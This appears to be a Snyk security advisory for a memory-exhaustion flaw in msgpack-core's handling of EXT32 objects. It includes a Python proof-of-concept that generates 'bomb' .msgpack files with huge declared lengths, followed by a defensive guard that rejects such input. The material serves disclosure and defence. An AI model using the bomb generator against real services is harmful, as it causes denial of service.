Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade org.msgpack:msgpack-core to version 0.9.11 or higher.
Affected versions of this package are vulnerable to Memory Allocation with Excessive Size Value in the deserialization process of .msgpack files containing EXT32 objects. An attacker can exhaust system memory and cause service unavailability by submitting a specially crafted .msgpack file containing a small EXT32 object with a very large declared payload length.
import msgpack
import struct
import os

OUTPUT_DIR = "bombs"
os.makedirs(OUTPUT_DIR, exist_ok=True)

# EXT format: fixext / ext8 / ext16 / ext32
# ext32 allows attacker-controlled length (uint32)
length = 1
step = 10_000_000

while True:
    try:
        # EXT32: 0xC9 | length (4 bytes) | type (1 byte)
        header = b'\xC9' + struct.pack(">I", length) + b'\x01'
        payload = b'A'  # actual data tiny: the declared length is never backed by real bytes
        data = header + payload
        fname = f"{OUTPUT_DIR}/ext_length_{length}.msgpack"
        with open(fname, "wb") as f:
            f.write(data)
        print(f"[+] Generated EXT bomb with declared length={length}")
        length += step
    except Exception as e:
        # struct.pack raises struct.error once length no longer fits in a uint32,
        # which is what ends the loop
        print("[!] Stopped:", e)
        break
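A pre-deserialization guard for the condition the files above rely on, written as an added example in Python using only the standard library (it is not Snyk's code and not part of msgpack-core): it parses the EXT header, reads the declared length, and rejects input whose declared length exceeds the bytes actually present or a configured cap, so the parser's allocation stays bounded by the input size. The marker table is taken from the msgpack spec; the cap value, function names and sample bytes are constructed for this example.

```python
import struct

# EXT marker -> (fixed payload length or None, header size incl. marker and type byte),
# per the msgpack spec.
EXT_MARKERS = {
    0xD4: (1, 2), 0xD5: (2, 2), 0xD6: (4, 2), 0xD7: (8, 2), 0xD8: (16, 2),  # fixext 1/2/4/8/16
    0xC7: (None, 3),  # ext8:  marker | len (1 byte)  | type
    0xC8: (None, 4),  # ext16: marker | len (2 bytes) | type
    0xC9: (None, 6),  # ext32: marker | len (4 bytes) | type
}
LEN_FORMAT = {0xC7: ">B", 0xC8: ">H", 0xC9: ">I"}


def ext_header(buf, offset=0):
    """Parse the EXT header at offset. Returns (declared_len, header_size), or None
    if the byte at offset is not an EXT marker. Raises ValueError when the header
    itself is truncated."""
    if offset >= len(buf):
        raise ValueError("empty input")
    marker = buf[offset]
    if marker not in EXT_MARKERS:
        return None
    fixed_len, hsize = EXT_MARKERS[marker]
    if len(buf) < offset + hsize:
        raise ValueError("truncated EXT header")
    if fixed_len is not None:
        return fixed_len, hsize
    (declared,) = struct.unpack_from(LEN_FORMAT[marker], buf, offset + 1)
    return declared, hsize


def check_ext_object(buf, max_ext_len=1 << 20):
    """Guard to run before handing bytes to a deserializer. Returns (ok, reason).
    A declared length larger than the bytes that follow, or larger than the cap
    (constructed default: 1 MiB), is rejected without allocating anything."""
    try:
        hdr = ext_header(buf)
    except ValueError as e:
        return False, str(e)
    if hdr is None:
        return True, "not an EXT object"
    declared, hsize = hdr
    available = len(buf) - hsize
    if declared > available:
        return False, f"declared {declared} bytes, only {available} present"
    if declared > max_ext_len:
        return False, f"declared {declared} bytes exceeds cap {max_ext_len}"
    return True, f"EXT with {declared} bytes"


# Constructed samples: the bomb shape from the script above vs. a consistent EXT32 object.
BOMB = b"\xC9" + struct.pack(">I", 10_000_000) + b"\x01" + b"A"
LEGIT = b"\xC9" + struct.pack(">I", 4) + b"\x01" + b"ABCD"
```

The same cap exists inside msgpack-python as the `max_ext_len` parameter of `Unpacker`; for msgpack-core the fix is the version upgrade stated above.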